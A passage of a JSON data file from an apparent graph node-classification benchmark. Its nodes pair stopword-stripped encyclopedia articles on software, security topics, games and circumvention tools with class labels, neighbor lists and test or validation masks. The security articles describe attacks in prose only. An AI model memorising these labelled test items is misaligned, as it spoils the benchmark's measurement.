    "text": "Aplos_Software:aplos software aplos software privately held company specializes software service nonprofit organizations primary focus simple software manage essential nonprofit tasks fund accounting nonprofit tax preparation donor management small mid-sized large non-profit organizations aplos software founded 2009 fresno california dan kelly tim goetz certified public accountant tim goetz previously served executive pastor church helped found two nonprofits could n't find low-cost fund accounting solution wanted nonprofits joined fresno-based investor shared vision serve nonprofit sector simple affordable software founded aplos software aplos software focused software simplifying primary back office tasks required manage nonprofit private foundation foundation nonprofit charitable organization church nonprofit fund accounting differs business accounting often necessary track restricted unrestricted funds separately often occurs donor grant specifies organization must use funds specific purpose accounting software must track funds used much available aplos first launched online fund accounting software aplos accounting 2011 popular competitive accounting product small mid-sized nonprofits quickbooks october 2012 aplos software launched aplos oversight online software provides administrator accountant real-time access accounting multiple organizations summer 2012 aplos software approved irs efile provider submit irs tax forms behalf tax-exempt organizations october 2012 launched aplos e-file tax preparation filing software irs form 990-n. irs form 990-n annual electronic irs filing tax-exempt organizations less 50,000 annual gross receipts 2013 aplos added tax preparation e-file software irs form 990-ez required schedules aplos e-file irs form 990-ez short form full form 990 irs tax forms available organizations 200,000 gross receipts 500,000 assets aplos software also focused expanding fundraising donation tracking aspects software since 2012 make successful vertical market nonprofits launched contributions management module 2012 tracked donations within aplos accounting created contribution statements annual giving receipts required irs july 2013 began offering donor management module may 2017 expanded module launch stand-alone product aplos donor management according chronicle philanthropy nonprofits increasingly creating initiatives accept donations online growth online giving outpaced traditional methods 2012 keep pace growing popularity requests customers online giving platform aplos software expanded fundraising functionality january 2014 partnering wepay online payment portal add ability nonprofits accept online donations",
    "neighbors": [
      7489,
      1539,
      5224,
      11113,
      7532,
      10509,
      1008,
      467,
      8307
    ],
    "mask": "Test"
  },
  {
    "node_id": 1681,
    "label": 4,
    "text": "M³AAWG:m³aawg messaging malware mobile anti-abuse working group m3aawg usually spelled m³aawg international information technology industry forum works reduce threat bots malware spam viruses dos attacks online exploitations one largest global organizations working forms messaging abuse represents billion mailboxes among global membership started group internet service providers mobile network operators telecommunications companies infrastructure vendors anti-spam technology vendors early 2004 fight spam help protect end-users spirit collaboration expanded include email service providers vetted parties interested safeguarding online ecosystem organization initially started maawg messaging anti-abuse working group spam morphed widely recognized vector spreading malware threats organization changed name messaging malware mobile anti-abuse working group 2012 better reflect scope work m3aawg three levels membership role m3aawg bring various aspects industry together discuss related anti-abuse issues based cooperative effort produce best practices public policy comments white papers materials also provides opportunity professionals share abuse information experience peers among currently available published best practices document help hosting service providers prevent abuse jointly published i2coalition anti-abuse recommendations messaging service providers best practices high-volume email marketing senders email service providers updated white paper email authentication m3aawg published first best practices mitigating bot infections residential networks july 2009 incorporated ietf rfc 6561 years later although m3aawg lobby government public policy matters supply factual information government organizations develop relevant policy legislation example anti-abuse issues proposed m3aawg holds three members-only meetings year two north america one europe four-day long meetings organized around multi-track conference sessions colleagues public policy representatives best practices document working sessions training courses global networking opportunities meetings often held conjunction relevant organizations past m3aawg hosted london action plan lap gsm association security group gsma-sg anti-phishing working group associations meetings june 2015 m3aawg jointly published global operation safety-net best practices london action plan cooperative global effort industry government experts written plain language describes common online threats currently facing businesses governments end-users along proven best practices mitigate m3aawg also publishes email metrics reports tracking volume abusive email using aggregated data provided m3aawg member isps email providers network operators bot metrics report detailing number subscribers identified system infected malware also known bot also conducted two surveys looking consumers email practices 2009 published survey north american users titled course never click spam except sometimes 2010 expanded survey cover north america europe youtube channel 70 training industry keynote short topical videos wide range computer security cybercrime topics training videos range isps identify clean malware customers systems tutorial using bettercrypto guide easily implement encryption keynotes include presentations state industry renowned security experts dan geer brian snow among others among many industry partners eastwest institute presented ewi 2013 cybersecurity award m3aawg recognition anti-abuse outreach india china facilitating cybersecurity global collaboration",
    "neighbors": [
      7739,
      7515,
      2508,
      2677
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1682,
    "label": 3,
    "text": "Gumstix:gumstix gumstix american multinational corporation headquartered redwood city california develops manufactures small system boards comparable size stick gum 2003 first fully functional used arm architecture system chip soc operating system based linux 2.6 kernel online tool called geppetto allows users design boards august 2013 started crowd-funding service allow group users want get custom design manufactured share setup costs also runs windows embedded compact",
    "neighbors": [
      1537,
      3585,
      2308,
      11396,
      10760,
      6925,
      11282,
      405,
      10393,
      666,
      5019,
      4124,
      6301,
      6178,
      291,
      8237,
      9266,
      3511,
      823,
      1849,
      8250,
      9913,
      1728,
      10945,
      6978,
      7234,
      7492,
      6981,
      10820,
      3911,
      11080,
      11337,
      2635,
      9163,
      6618,
      5339,
      2524,
      2784,
      1377,
      2788,
      3300,
      5356,
      2285,
      9581,
      9964,
      10606,
      499,
      2420,
      10109
    ],
    "mask": "Test"
  },
  {
    "node_id": 1683,
    "label": 4,
    "text": "Random_number_generator_attack:random number generator attack security cryptographic systems depends secret data known authorized persons unknown unpredictable others achieve unpredictability randomization typically employed modern cryptographic protocols often require frequent generation random quantities cryptographic attacks subvert exploit weaknesses process known random number generator attacks high quality random number generation rng process almost always required security lack quality generally provides attack vulnerabilities leads lack security even complete compromise cryptographic systems rng process particularly attractive attackers typically single isolated hardware software component easy locate attacker substitute pseudo-random bits generated way predict security totally compromised yet generally undetectable upstream test bits furthermore attacks require single access system compromised data need sent back contrast say computer virus steals keys e-mails drop point humans generally poorly generating random quantities magicians professional gamblers con artists depend predictability human behavior world war ii german code clerks instructed select three letters random initial rotor setting enigma machine message instead chose predictable values like girlfriend initials greatly aiding allied breaking encryption systems another example often predictable ways computer users choose passwords see password cracking nevertheless specific case playing mixed strategy games use human gameplay entropy randomness generation studied ran halprin moni naor components cryptosystem software random number generator designed resist certain attacks attacks possible rng include number attacks hardware random number generators possible including trying capture radio-frequency emissions computer obtaining hard drive interrupt times motor noise example trying feed controlled signals supposedly random source turning lights lava lamp feeding strong known signal sound card subverted random numbers created using cryptographically secure pseudorandom number generator seed value known attacker concealed software relatively short say 24 40 bit portion seed truly random prevent tell-tale repetitions long enough prevent attacker recovering say randomly produced key random numbers typically go several layers hardware software used bits may generated peripheral device sent serial cable collected operating system utility retrieved system call subverted bits substituted point process little likelihood detection hardware circuit produce subverted bits built integrated circuit millimeters square sophisticated hardware random number generator subverted placing chip anywhere upstream source randomness digitized say output driver chip even cable connecting rng computer subversion chip include clock limit start operation time unit first turned run acceptance tests contain radio receiver on/off control could installed manufacturer behest national signals intelligence service added later anyone physical access cpu chips built-in hardware random number generators replaced compatible chips subverted rng chips firmware designing secure random number generator requires least high level care designing elements cryptographic system early versions netscape secure socket layer ssl encryption protocol used pseudo-random quantities derived prng seeded three variable values time day process id parent process id quantities often relatively predictable little entropy less random version ssl found insecure result problem reported netscape 1994 phillip hallam-baker researcher cern web team fixed prior release problem running code discovered 1995 ian goldberg david wagner reverse engineer object code netscape refused reveal details random number generation security obscurity rng fixed later releases version 2 higher robust i.e. random higher entropy attacker perspective seeding microsoft uses unpublished algorithm generate random values windows operating system random quantities made available users via cryptgenrandom utility november 2007 leo dorrendorf et al hebrew university jerusalem university haifa published paper titled cryptanalysis random number generator windows operating system paper presented serious weaknesses microsoft approach time paper conclusions based disassembly code windows 2000 according microsoft applied windows xp well microsoft stated problems described paper addressed subsequent releases windows use different rng implementation u.s. national institute standards technology published collection deterministic random bit generators recommends nist special publication 800-90 one generators dual_ec_drbg favored national security agency dual_ec_drbg uses elliptic curve technology includes set recommended constants august 2007 dan shumow niels ferguson microsoft showed constants could constructed way create kleptographic backdoor algorithm september 2013 new york times wrote n.s.a inserted back door 2006 standard adopted n.i.s.t ... called dual ec drbg standard thereby revealing nsa carried malware attack american people december 2013 reuters reported documents released edward snowden indicated nsa paid rsa security 10 million make dual_ec_drbg default encryption software raised concerns algorithm might contain backdoor nsa due concerns 2014 nist withdrew dual ec drbg draft guidance random number generators recommending current users dual_ec_drbg transition one three remaining approved algorithms quickly possible crypto-1 cryptosystem developed nxp use mifare chips system proprietary originally algorithm published upon reverse engineering chip researchers university virginia chaos computer club found attack crypto-1 exploiting poorly initialized random number generator may 2008 security researcher luciano bello revealed discovery changes made 2006 random number generator version openssl package distributed debian gnu/linux debian-based distributions ubuntu dramatically reduced entropy generated values made variety security keys vulnerable attack security weakness caused changes made openssl code debian developer response compiler warnings apparently redundant code caused massive worldwide regeneration keys despite attention issue got could assumed many old keys still use key types affected include ssh keys openvpn keys dnssec keys key material use x.509 certificates session keys used ssl/tls connections keys generated gnupg gnutls affected programs used different methods generate random numbers keys generated non-debian-based linux distributions also unaffected weak-key-generation vulnerability promptly patched reported services still using keys generated old code remain vulnerable number software packages contain checks weak key blacklist attempt prevent use remaining weak keys researchers continue find weak key implementations december 2010 group calling fail0verflow announced recovery elliptic curve digital signature algorithm ecdsa private key used sony sign software playstation 3 game console attack made possible sony failed generate new random nonce signature analysis comparing millions rsa public keys gathered internet announced 2012 lenstra hughes augier bos kleinjung wachter able factor 0.2 keys using euclid algorithm exploited weakness unique cryptosystems based integer factorization one public key another chance simple computation factors n n ′ totally compromising keys nadia heninger part group similar experiment said bad keys occurred almost entirely embedded applications explains one-shared-prime problem uncovered two groups results situations pseudorandom number generator poorly seeded initially reseeded generation first second primes august 2013 revealed bugs java class securerandom could generate collisions k nonce values used ecdsa implementations bitcoin android occurred private key could recovered turn allowing stealing bitcoins containing wallet",
    "neighbors": [
      513,
      6916,
      517,
      1157,
      7556,
      1288,
      6797,
      9744,
      2709,
      1688,
      2083,
      8358,
      3495,
      5677,
      11693,
      11569,
      9394,
      2228,
      7736,
      7739,
      10173,
      1087,
      9281,
      9412,
      3657,
      5834,
      10442,
      7887,
      10831,
      11345,
      1114,
      474,
      3805,
      8671,
      7264,
      8674,
      7139,
      8037,
      10341,
      8937,
      2154,
      107,
      1776,
      5107,
      1526,
      2169,
      3707,
      5117,
      510
    ],
    "mask": "Test"
  },
  {
    "node_id": 1684,
    "label": 3,
    "text": "HardBall!:hardball hardball baseball video game published accolade released variety home computers 1985 1987 sega genesis version published 1991 game followed sequels hardball ii hardball iii hardball iv hardball 5 hardball 6 play controlled joystick arrow keys action button one four cardinal directions used choose pitch aim towards low high inside towards batter outside away batter directions used aim swing batting fielding hit defensive player closest ball flash show one currently control four directions used throw one four bases hardball one first baseball video games incorporate perspective pitcher mound similar mlb broadcasts also managerial options available player selection pitchers choose team member statistics affect performance rearranged desired prior hardball release managerial baseball games available microleague baseball hardball first integrate aspect arcade control game action hardball accolade best-selling commodore game late 1987 sales surpassed 250,000 copies november 1989 info rated hardball four-plus stars five stating easily best baseball simulation seen date 64/128 praising graphics analog computing praised atari 8-bit version gameplay graphic animation criticizing computer opponent low difficulty level magazine concluded game league atari sports games—simulations included overview statistics-oriented baseball games computer gaming world stated hardball would probably disappointing anyone avid arcade fan compute apple applications stated apple ii macintosh versions almost everything could want baseball simulation good support playing manager player statistician exceptionally clear precise graphics magazine concluded hardball realism outstanding—at level unmatched baseball software date game reviewed 1988 dragon 132 hartley patricia kirk lesser role computers column reviewers gave game 5 5 stars entertainment weekly picked game 11 greatest game available 1991 saying oversaturated colors ultrarealistic sound effects umpire shouts 'play ball sounds ’ room detailed managerial options hardball closest may ever get playing real major-league ballpark game appears opening scene 1987 film princess bride played fred savage",
    "neighbors": [
      9166
    ],
    "mask": "Test"
  },
  {
    "node_id": 1685,
    "label": 9,
    "text": "Metacompilation:metacompilation metacompilation computation involves metasystem transitions mst computing machine metamachine controls analyzes imitates work semantics-based program transformation partial evaluation supercompilation scp metacomputation metasystem transitions may repeated program transformer gets transformed manner mst hierarchies height formed fox paper reviews one strain research started russia valentin turchin refal system late 1960s-early 1970s became known development supercompilation distinct method program transformation brief description history research line paper concentrates results problems supercompilation combined repeated metasystem transitions",
    "neighbors": [
      3904,
      1952,
      8262,
      1552,
      4980,
      10616
    ],
    "mask": "Test"
  },
  {
    "node_id": 1686,
    "label": 2,
    "text": "Internet_Connect:internet connect internet connect program mac os x allows user activate dial-up connections internet via isp vpn also provides simple way connect airport network latest version mac os x 10.4 internet connect application provides general tools detailed network pane system preferences allows user configure control systemwide network settings however mac os x 10.5 internet connect functions incorporated network pane system preferences application longer included use internet connect generally necessary macintosh connected internet ethernet device dsl cable internet service except manage connections subordinate bluetooth equipment",
    "neighbors": [
      11521,
      2819,
      1796,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      8852,
      9109,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      811,
      3371,
      5292,
      1710,
      6700,
      7983,
      8877,
      1074,
      10036,
      3766,
      2232,
      9912,
      11257,
      9406,
      6849,
      4933,
      713,
      9418,
      9035,
      3790,
      7118,
      5713,
      3670,
      9430,
      4184,
      3035,
      4571,
      2141,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      6771,
      2676,
      5749,
      7928,
      8441,
      7163,
      7422
    ],
    "mask": "Test"
  },
  {
    "node_id": 1687,
    "label": 2,
    "text": "Carbide.c++:carbide.c++ carbide.c++ software development tool c++ development symbian os used develop phones use os well applications run phones based eclipse ide platform enhanced extra plug-ins support symbian os development product provided symbian foundation open source model april 2009 nokia transferred carbide.c++ many software developer tools symbian foundation members symbian community manage contribute code carbide.c++ product carbide.c++ provided symbian foundation two different tool packages adt pdt basic installers include carbide.c++ several eclipse-based plug-ins several stand-alone tools adt/pdt v1 contains carbide.c++ v2.0.4 br adt/pdt v2 q4 2009 targeted contain carbide.c++ v2.2 carbide.c++ based latest versions eclipse ide eclipse cdt extended symbian os -specific features currently supports winscw x86 c++ compiler found codewarrior production emulator binaries target binaries supports gcc arm rvct compilers sold separately winscw gcc compilers actually provided sdk explicitly included carbide ide carbide.c++ branched parts cdt nearly contained within added plug-ins added top eclipse branches mostly relate different semantics codewarrior debugger engine compared gdb eclipse previously supported carbide.c++ similar standard eclipse installation still used types development java perl provided correct plug-ins installed using eclipse self-update mechanism similarly ought possible produce product similar functionality carbide.c++ moving carbide.c++ plug-ins standard eclipse installation currently facility offered nokia carbide.c++ supports symbian build system v1 v2 aka raptor former perl-based build system latter built using python supports next generation symbian os operating systems main advantage supporting sbsv1 v2 carbide users create command-line builds parallel ide builds manage two different workspaces disadvantage sbsv1 dependency checking automatic every build re-building large projects take carbide.c++ built short cuts starting v1.3 speed rebuilds early versions carbide v1.0 1.1 supported different build method many problems carbide.c++ development tools family created replace codewarrior symbian os primary development environment symbian os adoption tool slow codewarrior usage diminishing since older tool longer supports latest changes symbian os s60 platforms carbide provided three commercial products one free product today product part symbian foundation offering completely free products ranged price 300 8000 euros depending features set licensing model carbide slow reception symbian community developers generally fond moving new tools early versions carbide problems several frequently cited complaints example lack symbian-os-style code indenting lack easy find files facility speed import symbian os build files mmps difficulties using on-device debugging addition much-anticipated managed build system work properly rather offering true incremental build frequently deleted everything started otherwise reception warm development environment preferred codewarrior ide based java speed memory concerns ide often slow pretty big memory foot print trademarks java environment carbide.c++ made steady progress addressing issues brought developer community codewarrior usage dropped significantly due improvements carbide codewarrior lack support newer versions symbian os symbian os c++ development need carbide.c++ ide symbian os-based sdk sdk contains emulator also libraries header files required symbian os development development kits available forum nokia symbian foundation web sites please note kits may different names reflecting additional capabilities cust kits developer kits pdk issk",
    "neighbors": [
      10754,
      6276,
      11271,
      6797,
      11277,
      5406,
      2465,
      9509,
      3626,
      9262,
      7983,
      11446,
      11208,
      4171,
      7246,
      4305,
      7253,
      6998,
      2658,
      8423,
      10599,
      3583
    ],
    "mask": "Test"
  },
  {
    "node_id": 1688,
    "label": 4,
    "text": "DROWN_attack:drown attack drown decrypting rsa obsolete weakened encryption attack cross-protocol security bug attacks servers supporting modern tls protocol suites using support obsolete insecure ssl v2 protocol leverage attack connections using up-to-date protocols would otherwise secure drown affect types servers offer services encrypted tls yet still support sslv2 provided share public key credentials two protocols additionally public key certificate used different server supports sslv2 tls server also vulnerable due sslv2 server leaking key information used tls server full details drown announced march 2016 along patch disables sslv2 openssl vulnerability assigned id patch alone sufficient mitigate attack certificate found another sslv2 host viable countermeasure disable sslv2 servers researchers estimated 33 https sites affected vulnerability march 1 2016 drown acronym decrypting rsa obsolete weakened encryption exploits vulnerability combination protocols used configuration server rather specific implementation error according discoverers exploit fixed making changes client software web browsers exploit includes chosen-ciphertext attack use sslv2 server bleichenbacher oracle proof-of-concept attack demonstrated multi-gpu configurations commercial cloud computing could perform part codebreaking calculations cost around 18,000 gpu setup per-attack cost 400 cloud successful attack provide session key captured tls handshake investigators described attack general drown attack also found specific weakness openssl implementation sslv2 allowed called special drown attack vastly reduced effort required break encryption making real-time man-in-the-middle attacks possible required modest computing resources original reporters bug security researchers nimrod aviram sebastian schinzel protect drown server operators need ensure private keys used anywhere server software allows sslv2 connections includes web servers smtp servers imap pop servers software supports ssl/tls openssl group released security advisory set patches intended mitigate vulnerability removing support obsolete protocols ciphers however server certificate used servers support sslv2 still vulnerable patched servers numerous sources recommended vulnerability patched soon possible site operators",
    "neighbors": [
      1024,
      513,
      5636,
      517,
      9744,
      4117,
      8726,
      535,
      9761,
      2083,
      4644,
      4133,
      7736,
      9281,
      1608,
      3657,
      8779,
      10831,
      11345,
      4703,
      7264,
      8288,
      4194,
      8292,
      10341,
      2169,
      3707,
      10875,
      3711,
      8320,
      5764,
      1157,
      2187,
      4240,
      1683,
      2709,
      1688,
      2717,
      3742,
      9375,
      161,
      8358,
      9904,
      177,
      9394,
      9395,
      8886,
      9412,
      5834,
      3789,
      5325,
      4304,
      4314,
      9435,
      3805,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      4863,
      2815,
      3843,
      1797,
      10502,
      1288,
      10003,
      11044,
      297,
      2857,
      8489,
      11052,
      9518,
      11569,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      10622,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      11693,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      5590,
      7639,
      8664,
      474,
      1504,
      8674,
      7139,
      9186,
      2542,
      5107,
      501,
      1526,
      507,
      510
    ],
    "mask": "Test"
  },
  {
    "node_id": 1689,
    "label": 4,
    "text": "Parasoft:parasoft parasoft officially parasoft corporation independent software vendor specializing automated software testing application security headquarters monrovia california founded 1987 four graduates california institute technology planned commercialize parallel computing software tools working caltech cosmic cube first working hypercube computer built 90 parasoft leveraged technology parallel software toolkit create software test automation tools traditional software development well parallel starting runtime error detection c c++ insure++ product also added capabilities static code analysis unit testing ultimately expanded include application security functional testing service virtualization parasoft develops automated defect prevention technologies support automated defect prevention methodology developed adam kolawa technologies automate number defect prevention practices java c c++ .net static code analysis practice identifies coding issues lead security reliability performance maintainability issues later 1996 parasoft submitted patent application rule-based static code analysis since original static analysis technology extended include security static analysis data flow analysis software metrics 1996 parasoft submitted patent applications technology automatically generates unit test cases since original unit testing technology extended include code coverage analysis regression testing traceability peer code review practice involves manually inspecting source code examine algorithms review design search subtle errors automated tools detect although peer inspection automated peer code reviews preparation notification tracking automated cloud soa apis enterprise environments parasoft technologies automate practices api testing integration testing system testing load testing penetration testing parasoft service soa quality technology first developed 2002 parasoft also develops memory error detection technology finds run-time errors c c++ programs patents submitted technology 1995 1996 service virtualization parasoft technologies used automatically capture emulate dependent system behavior mainframes third-party components system component unavailable difficult access development testing purposes parasoft various technologies used demonstrating industry regulatory compliance adopting agile software development devops continuous delivery continuous testing test automation parasoft joined eclipse consortium board stewards 2002 several analyst reports software industry publications mentioned company service virtualization technology embedded system software development tools parasoft c/c++test comprehensive software testing tool contains functionality test find software defects includes static code analysis functionality 2,000 rules support major standards safety-critical software security misra jsf ul-2900 cwe cert also functionality software metrics unit test generation execution well code coverage analysis c/c++test integrates parasoft dtp provide full reporting analytics needed software development especially embedded safety-critical systems devices parasoft jtest static analysis unit testing tool java parasoft started shipping 1997 since jtest numerous awards including multiple jolt awards dr. dobb journal well multiple codies jtest 1100 coding rules support major standards owasp top 10 cwe jsf pci-dss ul-2900 jtest works standalone product via eclipse visual studio plugin also work command line tool lightweight engine used ci systems jenkins continuous testing jtest integrates parasoft dtp full reporting analytics including industry specific reports owasp cwe jtest unit test assistant called uta helps create unit tests including support mocks stubs also integrates running applications help create meaningful tests advice expanding improving existing tests parasoft dottest set tools testing .net applications works plugin visual studio supports development testing practices static code analysis unit test creation execution code coverage software metrics configurations coding standards like cwe owasp ul-2900 available dottest connected parasoft dtp provide full traceability assist compliance related software industry fda medical devices need able prove practices testing performed part audit parasoft insure++ automated runtime debugger memory error detection tool parasoft began selling 1993 insure++ often used find common memory problems c c++ programs memory leaks memory underruns overflows numeric overflows performs dynamic analysis using source code instrumentation allows catch many kinds errors including static heap errors well parasoft soatest automated api testing tool allows developers testers also perform functional testing end-to-end testing security testing load performance testing supports 100 common protocols web services rest json mq jms tibco http xml edi tests created either programmatically graphically allowing testers developers create share tests soatest functionality intelligent stubs also integrates parasoft virtualize full api protocol simulation service virtualization help shift testing earlier development process soatest integrates parasoft continuous testing platform allow users create manage execute test cases via browser well providing reports analytics parasoft virtualize service virtualization tool sometimes also called api simulation provides users ability create deploy manage simulated test environments well simplify test data management primarily facilitate testing earlier well improve access systems may scheduling constraints expensive maintain dedicated versions integrates parasoft soatest provide full end-to-end testing capabilities virtualize integrates parasoft continuous testing platform allows users create manage deploy virtual test assets environments web interface well integrated continuous integration system parasoft dtp hub development testing released 2003 name parasoft concerto 2012 dtp best show embeddy award vdc research dtp collects data various software development activities testing static analysis code coverage metrics well integrating sdlc systems bug-tracking peer review requirements data collected used create detailed reports software quality well compliance variety industry standards like fda misra do-178b/c also supports security standards cert owasp cwe security reports include data standard risk frameworks like “ common weakness risk analysis framework ” cwe help measure so-called technical impact finding means instead simply reporting software defect like buffer overflow data include information kinds security problems occur overflow exposure private data ddos information helps developers security testers prioritize findings important addition reporting dashboards dtp analytics engine called “ process intelligence engine ” “ pie ” users take advantage pre-build analytics modules tasks like change-based testing also use graphical tool web interface create analytics parasoft received customers choice award gartner march 2019 best software test automation software 2019 reviewed customers parasoft soatest recognized leader forrester 2018 forrester wave omnichannel functional test tools reported said parasoft shined evaluation specifically around effective test maintenance strong ci/cd application lifecycle management alm platform integration parasoft received best show software development award testing category sd times 2018 part sd times 100 list parasoft global provider software test automation tools analytics global headquarters monrovia california headquarters building heart monrovia high tech corridor home marketing development sales solution architects technical support professional services parasoft distributors canada latin america provide local sales technical support parasoft strong presence emea centers around offices krakow poland hague netherlands krakow full range capabilities development technical support professional services sales solution architects variety languages hague staff marketing sales solution architects professional services technical support parasoft subsidiaries berlin germany london uk stockholm sweden distributors france italy israel south africa early corporate history parasoft strong ties asia shanghai china parasoft subsidiary full staff marketing sales solution architects professional services technical support parasoft also subsidiaries sales staff solution architects professional services technical support bangalore india singapore techmatrix distributor parasoft japan two companies relationship going back two decades parasoft also distributors south korea australia new zealand",
    "neighbors": [
      6373,
      3048,
      5677,
      814,
      7228,
      6998,
      11446,
      5404,
      2045,
      3583
    ],
    "mask": "Test"
  },
  {
    "node_id": 1690,
    "label": 4,
    "text": "Palm_OS_viruses:palm os viruses viruses exist palm os based devices ever designed typically mobile devices difficult virus writers target since simplicity provides fewer security holes target compared desktop",
    "neighbors": [
      3072,
      6786,
      5764,
      7044,
      10245,
      10756,
      9227,
      9356,
      9102,
      7441,
      8978,
      4863,
      4883,
      4245,
      278,
      9233,
      10392,
      9242,
      3867,
      10141,
      5281,
      9761,
      2213,
      8998,
      9256,
      939,
      300,
      9771,
      1970,
      4023,
      10297,
      3643,
      6588,
      7739,
      9791,
      1088,
      3395,
      8387,
      4165,
      2508,
      3032,
      4314,
      7515,
      4344,
      9187,
      3941,
      11621,
      107,
      877,
      9591,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 1691,
    "label": 4,
    "text": "ARMM_(Usenet):armm usenet automated retroactive minimal moderation armm program developed richard depew 1993 aid control usenet abuse concerned abusive posts emanating certain anonymous-posting sites depew developed armm allow news administrators automatically issue cancel messages posts controversial act many news administrators users concerned censorship netnews medium early version armm contained bug caused post follow-ups messages recursively sending posts news.admin.policy newsgroup early example unintentional usenet spam",
    "neighbors": [
      3350
    ],
    "mask": "None"
  },
  {
    "node_id": 1692,
    "label": 4,
    "text": "Internet_censorship_circumvention:internet censorship circumvention internet censorship circumvention use various methods tools bypass internet censorship various techniques methods used bypass internet censorship differing ease use speed security risks methods use alternate dns servers evade blocking using alternate address address lookup system access site techniques using website mirrors archive sites rely copies site available different locations additionally solutions rely gaining access internet connection subject filtering often different jurisdiction subject censorship laws using technologies proxying virtual private networks anonymization networks arms race developed censors developers circumvention software resulting sophisticated blocking techniques censors development harder-to-detect tools researchers estimates adoption circumvention tools vary substantially disputed barriers adoption include usability issues difficulty finding reliable trustworthy information circumvention lack desire access censored content risks breaking law many methods available may allow circumvention internet filtering widely vary terms implementation difficulty effectiveness resistance detection filters may block specific domain names either using dns hijacking url filtering sites sometimes accessible alternate names addresses may blocked websites may offer content multiple pages domain names example english wikipedia available https //en.wikipedia.org/ also mobile-formatted version https //en.m.wikipedia.org/ dns resolution disrupted site blocked ways may possible access site directly ip address using alternative dns servers public recursive name servers may bypass dns-based blocking censors may block specific ip addresses depending filtering implemented may possible use different forms ip address specifing address different base example following urls access site although browsers recognize forms http //208.80.152.2 dotted decimal http //3494942722 decimal http //0320.0120.0230.02 dotted octal http //0xd0509802 hexadecimal http //0xd0.0x50.0x98.0x2 dotted hexadecimal cached pages search engines keep copies previously indexed webpages cached pages often hosted search engines may blocked example google allows retrieval cached pages entering cache some-url search request mirror archive sites copies web sites pages may available mirror archive sites internet archive wayback machine rss aggregators rss aggregators feedly may able receive pass rss feeds blocked accessed directly web proxies proxy websites configured allow users load external web pages proxy server permitting user load page coming proxy server blocked source however depending proxy configured censor may able determine pages loaded and/or determine user using proxy server example mobile opera mini browser uses proxy-based approach employing encryption compression order speed downloads side effect allowing circumvent several approaches internet censorship 2009 led government china ban special chinese versions browser domain fronting circumvention software implement technique called domain fronting destination connection hidden passing initial requests content delivery network popular site technique used messaging applications including signal telegram large cloud providers amazon web services google cloud longer permit use ssh tunneling establishing ssh tunnel user forward traffic encrypted channel outgoing requests blocked sites response sites hidden censors appears unreadable ssh traffic virtual private network vpn using vpn user experiences internet censorship create secure connection permissive country browse internet situated country services offered monthly fee others ad-supported according globalwebindex 400 million people use virtual private networks circumvent censorship increased level privacy tor advanced tools tor route encrypted traffic multiple servers make source destination traffic less traceable cases used avoid censorship especially configured use traffic obfuscation techniques censor may able detect block use circumvention tools efforts make circumvention tools less detectable randomizing traffic attempting mimic non-blocked protocol tunneling traffic whitelisted service using techniques including domain fronting tor circumvention tools adopted multiple obfuscation techniques users use depending nature connection sometimes called pluggable transports sneakernet transfer electronic information especially computer files physically carrying data storage media one place another sneakernet move data regardless network restrictions simply using network one example widely adopted sneakernet network el paquete semanal cuba circumvention tools seen spikes adoption response high-profile blocking attempts however studies measuring adoption circumvention tools countries persistent widespread censorship report mixed results measures estimates circumvention tool adoption reported widely divergent results 2010 study harvard university researchers estimated users use censorship circumvention tools—likely less 3 users even countries consistently implement widespread censorship studies reported substantially larger estimates disputed china anecdotal reports suggest adoption circumvention tools particularly high certain communities universities survey freedom house found users generally find circumvention tools difficult use market research firm globalwebindex reported 35 million twitter users 63 million facebook users china services blocked however estimates disputed facebook advertising platform estimates 1 million users china reports twitter adoption estimate 10 million users studies pointed efforts block circumvention tools china reduced adoption tools tor network previously 30,000 users connecting china 2014 approximately 3,000 chinese users thailand internet censorship existed since 2002 sporadic inconsistent filtering small-scale survey 229 thai internet users research group university washington found 63 surveyed users attempted use circumvention tools 90 successful using tools users often made on-the-spot decisions use circumvention tools based limited unreliable information variety perceived threats abstract others concrete based personal experiences response 2014 blocking twitter turkey information alternate dns servers widely shared using another dns server google public dns allowed users access twitter day block total number posts made turkey 138 according brandwatch internet measurement firm april 2018 ban telegram messaging app iran web searches vpn circumvention software increased much 48x search terms evidence users downloading unsafe software many third iranian internet users used psiphon tool days immediately following block june 2018 many 3.5 million iranian users continued use tool circumvention anonymity different circumvention systems designed bypass blocking usually protect identities anonymous systems protect user identity contribute circumvention primary function important understand open public proxy sites provide anonymity view record location computers making requests well websites accessed many jurisdictions accessing blocked content serious crime particularly content considered child pornography threat national security incitement violence thus important understand circumvention technologies protections provide use tools appropriate particular context great care must taken install configure use circumvention tools properly individuals associated high-profile rights organizations dissident protest reform groups take extra precautions protect online identities circumvention sites tools provided operated trusted third parties located outside censoring jurisdiction collect identities personal information best trusted family friends personally known circumventor family friends available sites tools provided individuals organizations known reputations recommendations endorsement others may need used commercial circumvention services may provide anonymity surfing internet could compelled law make records users personal information available law enforcement five general types internet censorship circumvention software cgi proxies use script running web server perform proxying function cgi proxy client sends requested url embedded within data portion http request cgi proxy server cgi proxy server pulls ultimate destination information data embedded http request sends http request ultimate destination returns result proxy client cgi proxy tool security trusted far operator proxy server trusted cgi proxy tools require manual configuration browser client software installation require user use alternative potentially confusing browser interface within existing browser http proxies send http requests intermediate proxying server client connecting http proxy sends exactly http request proxy would send destination server unproxied http proxy parses http request sends http request ultimate destination server returns response back proxy client http proxy tool security trusted far operator proxy server trusted http proxy tools require either manual configuration browser client side software configure browser user configured http proxy tool allows user transparently use normal browser interface application proxies similar http proxies support wider range online applications peer-to-peer systems store content across range participating volunteer servers combined technical techniques re-routing reduce amount trust placed volunteer servers social networks establish trust relationships server client users peer-to-peer system trusted far operators various servers trusted extent architecture peer-to-peer system limits amount information available single server server operators trusted cooperate combine information hold re-routing systems send requests responses series proxying servers encrypting data proxy given proxy knows either data came going decreases amount trust required individual proxy hosts list different internet censorship circumvention software",
    "neighbors": [
      4224,
      10368,
      5254,
      138,
      9868,
      1169,
      9233,
      2076,
      9117,
      1317,
      3625,
      1070,
      11695,
      10417,
